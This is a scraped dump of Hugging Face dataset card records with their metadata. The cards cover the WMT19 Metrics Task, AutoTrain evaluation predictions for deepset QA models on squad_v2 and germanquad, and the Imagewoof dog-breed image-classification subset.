"license:unknown",
"region:us"
] | 2022-07-26T06:21:28+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["found", "machine-generated", "expert-generated"], "language": ["de-cs", "de-en", "de-fr", "en-cs", "en-de", "en-fi", "en-gu", "en-kk", "en-lt", "en-ru", "en-zh", "fi-en", "fr-de", "gu-en", "kk-en", "lt-en", "ru-en", "zh-en"], "license": ["unknown"], "multilinguality": ["translation"], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["translation"], "task_ids": [], "pretty_name": "WMT19 Metrics Shared Task"} | 2022-07-26T09:06:23+00:00 | [] | [
"de-cs",
"de-en",
"de-fr",
"en-cs",
"en-de",
"en-fi",
"en-gu",
"en-kk",
"en-lt",
"en-ru",
"en-zh",
"fi-en",
"fr-de",
"gu-en",
"kk-en",
"lt-en",
"ru-en",
"zh-en"
] | TAGS
#task_categories-translation #annotations_creators-expert-generated #language_creators-found #language_creators-machine-generated #language_creators-expert-generated #multilinguality-translation #size_categories-100K<n<1M #license-unknown #region-us
|
# Dataset Card for WMT19 Metrics Task
## Table of Contents
- Table of Contents
- Dataset Description
- Dataset Summary
- Supported Tasks and Leaderboards
- Languages
- Dataset Structure
- Data Instances
- Data Fields
- Data Splits
- Dataset Creation
- Curation Rationale
- Source Data
- Annotations
- Personal and Sensitive Information
- Considerations for Using the Data
- Social Impact of Dataset
- Discussion of Biases
- Other Known Limitations
- Additional Information
- Dataset Curators
- Licensing Information
- Citation Information
- Contributions
## Dataset Description
- Homepage: WMT19 Metrics Shared Task
- Repository: MT Metrics Eval Github Repository
- Paper: Paper
### Dataset Summary
### Supported Tasks and Leaderboards
### Languages
The dataset comprises the following language pairs:
- de-cs
- de-en
- de-fr
- en-cs
- en-de
- en-fi
- en-gu
- en-kk
- en-lt
- en-ru
- en-zh
- fi-en
- fr-de
- gu-en
- kk-en
- lt-en
- ru-en
- zh-en
## Dataset Structure
### Data Instances
### Data Fields
### Data Splits
## Dataset Creation
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
## Considerations for Using the Data
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
## Additional Information
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @github-username for adding this dataset.
| [
"# Dataset Card for WMT19 Metrics Task",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: WMT19 Metrics Shared Task\n- Repository: MT Metrics Eval Github Repository\n- Paper: Paper",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages\n\n\n\nThe dataset comprises the following language pairs:\n- de-cs\n- de-en\n- de-fr\n- en-cs\n- en-de\n- en-fi\n- en-gu\n- en-kk\n- en-lt\n- en-ru\n- en-zh\n- fi-en\n- fr-de\n- gu-en\n- kk-en\n- lt-en\n- ru-en\n- zh-en",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] | [
"TAGS\n#task_categories-translation #annotations_creators-expert-generated #language_creators-found #language_creators-machine-generated #language_creators-expert-generated #multilinguality-translation #size_categories-100K<n<1M #license-unknown #region-us \n",
"# Dataset Card for WMT19 Metrics Task",
"## Table of Contents\n- Table of Contents\n- Dataset Description\n - Dataset Summary\n - Supported Tasks and Leaderboards\n - Languages\n- Dataset Structure\n - Data Instances\n - Data Fields\n - Data Splits\n- Dataset Creation\n - Curation Rationale\n - Source Data\n - Annotations\n - Personal and Sensitive Information\n- Considerations for Using the Data\n - Social Impact of Dataset\n - Discussion of Biases\n - Other Known Limitations\n- Additional Information\n - Dataset Curators\n - Licensing Information\n - Citation Information\n - Contributions",
"## Dataset Description\n\n- Homepage: WMT19 Metrics Shared Task\n- Repository: MT Metrics Eval Github Repository\n- Paper: Paper",
"### Dataset Summary",
"### Supported Tasks and Leaderboards",
"### Languages\n\n\n\nThe dataset comprises the following language pairs:\n- de-cs\n- de-en\n- de-fr\n- en-cs\n- en-de\n- en-fi\n- en-gu\n- en-kk\n- en-lt\n- en-ru\n- en-zh\n- fi-en\n- fr-de\n- gu-en\n- kk-en\n- lt-en\n- ru-en\n- zh-en",
"## Dataset Structure",
"### Data Instances",
"### Data Fields",
"### Data Splits",
"## Dataset Creation",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information",
"## Considerations for Using the Data",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations",
"## Additional Information",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\nThanks to @github-username for adding this dataset."
] |
53514cd2b8c3bccdde0a61348e5ef76d3a6748a6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855583 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/electra-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:48+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/electra-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/electra-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/electra-base-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
696f9a3028e982a43e69283dab450a4be0e0f72e | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855584 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:41+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinybert-6l-768d-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:20+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinybert-6l-768d-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinybert-6l-768d-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/tinybert-6l-768d-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
55b89a23287e3762d16ad2ed49412c4dbb00d49a | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855585 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-base-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:49+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-base-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-base-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-base-uncased-squad2\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
e5c897042bb83fe95d7f687c51d48ed06f2b55a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855586 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:51+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/bert-medium-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:20:27+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/bert-medium-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-medium-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/bert-medium-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
425e4ccec0605e663e762c5a088dcc5c6884329b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjrlee](https://huggingface.co/sjrlee) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-e06b4410-11855587 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T07:17:57+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T07:21:10+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjrlee for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/xlm-roberta-base-squad2-distilled\n* Dataset: squad_v2\n* Config: squad_v2\n* Split: validation\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjrlee for evaluating this model."
] |
0d81b9869910b53d9fac2bddf8d3e2eb2afe8a50 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875589 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:50+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-base-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:30+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-base-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjlree for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-base-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-base-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] |
0b848ff3c9d5c4d515e9fea94415453bc756d489 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@sjlree](https://huggingface.co/sjlree) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-deepset__germanquad-7176bd7d-11875590 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-26T13:38:52+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["deepset/germanquad"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/gelectra-large-germanquad", "metrics": [], "dataset_name": "deepset/germanquad", "dataset_config": "plain_text", "dataset_split": "test", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-26T13:40:57+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Question Answering
* Model: deepset/gelectra-large-germanquad
* Dataset: deepset/germanquad
* Config: plain_text
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @sjlree for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-large-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Question Answering\n* Model: deepset/gelectra-large-germanquad\n* Dataset: deepset/germanquad\n* Config: plain_text\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @sjlree for evaluating this model."
] |
8dc1bdb0cbe71fea85bb3a4f14c2c1b57c61d88f |
# Dataset Card for Imagewoof
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://github.com/fastai/imagenette#imagewoof
- **Repository:** https://github.com/fastai/imagenette
- **Leaderboard:** https://paperswithcode.com/sota/image-classification-on-imagewoof
### Dataset Summary
A smaller subset of 10 classes from [Imagenet](https://huggingface.co/datasets/imagenet-1k#dataset-summary) that aren't so easy to classify, since they're all dog breeds.
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward), and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.
### Supported Tasks and Leaderboards
- `image-classification`: The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
## Dataset Structure
### Data Instances
A data point comprises an image URL and its classification label.
```
{
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=320x320 at 0x19FA12186D8>,
'label': 'Beagle',
}
```
### Data Fields
- `image`: A `PIL.Image.Image` object containing the image.
- `label`: the expected class label of the image.
### Data Splits
| |train|validation|
|---------|----:|---------:|
|imagewoof| 9025| 3929|
## Dataset Creation
### Curation Rationale
cf. https://huggingface.co/datasets/imagenet-1k#curation-rationale
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of [ImageNet](https://huggingface.co/datasets/imagenet-1k). Information about data collection of the source data can be found [here](https://huggingface.co/datasets/imagenet-1k#initial-data-collection-and-normalization).
### Annotations
#### Annotation process
cf. https://huggingface.co/datasets/imagenet-1k#annotation-process
#### Who are the annotators?
cf. https://huggingface.co/datasets/imagenet-1k#who-are-the-annotators
### Personal and Sensitive Information
cf. https://huggingface.co/datasets/imagenet-1k#personal-and-sensitive-information
## Considerations for Using the Data
### Social Impact of Dataset
cf. https://huggingface.co/datasets/imagenet-1k#social-impact-of-dataset
### Discussion of Biases
cf. https://huggingface.co/datasets/imagenet-1k#discussion-of-biases
### Other Known Limitations
cf. https://huggingface.co/datasets/imagenet-1k#other-known-limitations
## Additional Information
### Dataset Curators
cf. https://huggingface.co/datasets/imagenet-1k#dataset-curators
and Jeremy Howard
### Licensing Information
[Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0).
### Citation Information
```
@software{Howard_Imagewoof_2019,
title={Imagewoof: a subset of 10 classes from Imagenet that aren't so easy to classify},
author={Jeremy Howard},
year={2019},
month={March},
publisher = {GitHub},
url = {https://github.com/fastai/imagenette#imagewoof}
}
```
### Contributions
This dataset was created by [Jeremy Howard](https://twitter.com/jeremyphoward) and published on [Github](https://github.com/fastai/imagenette). It was then only integrated into HuggingFace Datasets by [@frgfm](https://huggingface.co/frgfm).
| frgfm/imagewoof | [
"task_categories:image-classification",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"size_categories:1K<n<10K",
"source_datasets:extended",
"language:en",
"license:apache-2.0",
"region:us"
] | 2022-07-26T14:21:56+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "language": ["en"], "license": ["apache-2.0"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": ["extended"], "task_categories": ["image-classification"], "task_ids": [], "paperswithcode_id": "imagewoof", "pretty_name": "Imagewoof"} | 2022-12-11T22:26:18+00:00 | [] | [
"en"
] | TAGS
#task_categories-image-classification #annotations_creators-crowdsourced #language_creators-crowdsourced #size_categories-1K<n<10K #source_datasets-extended #language-English #license-apache-2.0 #region-us
| Dataset Card for Imagewoof
==========================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Leaderboard: URL
### Dataset Summary
A smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.
This dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.
### Supported Tasks and Leaderboards
* 'image-classification': The dataset can be used to train a model for Image Classification.
### Languages
The class labels in the dataset are in English.
Dataset Structure
-----------------
### Data Instances
A data point comprises an image URL and its classification label.
### Data Fields
* 'image': A 'PIL.Image.Image' object containing the image.
* 'label': the expected class label of the image.
### Data Splits
Dataset Creation
----------------
### Curation Rationale
cf. URL
### Source Data
#### Initial Data Collection and Normalization
Imagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.
### Annotations
#### Annotation process
cf. URL
#### Who are the annotators?
cf. URL
### Personal and Sensitive Information
cf. URL
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
cf. URL
### Discussion of Biases
cf. URL
### Other Known Limitations
cf. URL
Additional Information
----------------------
### Dataset Curators
cf. URL
and Jeremy Howard
### Licensing Information
Apache License 2.0.
### Contributions
This dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm.
| [
"### Dataset Summary\n\n\nA smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.\nThis dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.",
"### Supported Tasks and Leaderboards\n\n\n* 'image-classification': The dataset can be used to train a model for Image Classification.",
"### Languages\n\n\nThe class labels in the dataset are in English.\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nA data point comprises an image URL and its classification label.",
"### Data Fields\n\n\n* 'image': A 'PIL.Image.Image' object containing the image.\n* 'label': the expected class label of the image.",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale\n\n\ncf. URL",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nImagewoof is a subset of ImageNet. Information about data collection of the source data can be found here.",
"### Annotations",
"#### Annotation process\n\n\ncf. URL",
"#### Who are the annotators?\n\n\ncf. URL",
"### Personal and Sensitive Information\n\n\ncf. URL\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset\n\n\ncf. URL",
"### Discussion of Biases\n\n\ncf. URL",
"### Other Known Limitations\n\n\ncf. URL\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\ncf. URL\nand Jeremy Howard",
"### Licensing Information\n\n\nApache License 2.0.",
"### Contributions\n\n\nThis dataset was created by Jeremy Howard and published on Github. It was then only integrated into HuggingFace Datasets by @frgfm."
] | [
"TAGS\n#task_categories-image-classification #annotations_creators-crowdsourced #language_creators-crowdsourced #size_categories-1K<n<10K #source_datasets-extended #language-English #license-apache-2.0 #region-us \n",
"### Dataset Summary\n\n\nA smaller subset of 10 classes from Imagenet that aren't so easy to classify, since they're all dog breeds.\nThis dataset was created by Jeremy Howard, and this repository is only there to share his work on this platform. The repository owner takes no credit of any kind in the creation, curation or packaging of the dataset.",
